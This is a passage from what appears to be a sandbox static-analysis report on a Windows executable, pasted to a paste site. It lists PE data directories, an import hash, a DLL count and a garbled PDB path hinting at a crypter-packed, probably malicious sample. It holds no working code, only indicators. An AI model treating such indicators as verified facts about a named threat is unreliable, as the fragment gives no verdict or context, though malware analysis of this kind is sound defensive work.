- "virtual_address": "0x0002a000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x0000019c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "e226e36fbb8dbb02d3784367b0c7fa81",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": "C:\\vagar_helayagu-limi.pdb\\x00ntime\\crypt\\tmp_92407619\\bin\\vuvigilil.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xab\\x00\\x00\\x00\\xab\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\xd7C\\x00\\xf8\\x9aC",
- "imported_dll_count": 4,
- "versioninfo": []
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment